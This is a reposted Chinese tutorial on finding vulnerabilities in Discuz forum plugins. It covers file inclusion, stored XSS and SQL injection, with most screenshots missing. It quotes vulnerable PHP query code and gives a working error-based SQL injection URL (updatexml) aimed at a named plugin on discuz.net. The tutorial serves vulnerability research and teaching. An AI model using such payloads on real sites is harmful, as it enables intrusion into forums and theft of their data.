加入收藏 | 设为首页 | 会员中心 | 我要投稿 厦门站长网 (https://www.0592zz.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 大数据 > 正文

Disucz 插件漏洞挖掘

发布时间:2021-02-06 14:12:42 所属栏目:大数据 来源:网络整理
导读:副标题#e# 前言 Discuz 是北京康盛新创科技有限责任公司推出的一套通用的社区论坛软件系统。自2001年6月面世以来,Discuz!已拥有15年以上的应用历史和200多万网站用户案例,是全球成熟度最高、覆盖率最大的论坛软件系统之一。 来自第三方漏洞平台Discuz的查

Disucz 插件漏洞挖掘


(2)任意文件包含


某积分商城插件


#漏洞文件 dc_mall.inc.php


Disucz 插件漏洞挖掘


#包含测试


Disucz 插件漏洞挖掘


(3)XSS


某活动插件


#漏洞文件 event_list.inc.php


Disucz 插件漏洞挖掘


//这些参数只是经过了转义,但是并没有将html标签实体化


Disucz 插件漏洞挖掘


//导致这里直接插入数据库,最后在后台输出将会导致存储xss

5.漏洞Exp的构造

这里以 nds_up_ques 插件作为第一个例子,其存在一个sql注入漏洞


在nds_ques_viewanswer.inc.php文件中,首先,通过该文件的文件得知我们可以通过


http://www.discuz.net/plugin.php?id=nds_up_ques:nds_ques_viewanswer


这样的url去调用到这个文件; ?然后下面我们来看其中的代码:


Disucz 插件漏洞挖掘


//忽略一点无关紧要的代码


$query = DB::query ( " SELECT * FROM " . DB::table ( 'ques_user' ) . " WHERE `topicid`='$topicid' " . $wherestr . " ?ORDER by $orderby $imes LIMIT $start_limit,$perpage" );


//这里可以看到把orderby和imes直接带入查询了,导致了sql注入




Disucz 插件漏洞挖掘


那么最终我们的exp就是:


?http://www.discuz.net/plugin.php?id=nds_up_ques:nds_ques_viewanswer&&srchtxt=1&orderby=dateline and 1=(updatexml(1,concat(0x27,version()),1))--

工具推荐:Dzscan(dzscan.org) Discuz扫描器,完全针对国产Disucz论坛进行开发的扫描器,深度挖掘存在的漏洞,并且有一个正在长期维护的漏洞库。

6.参考

《Discuz!插件开发文档》

《CoNd0r@CodeScan》


(编辑:厦门站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!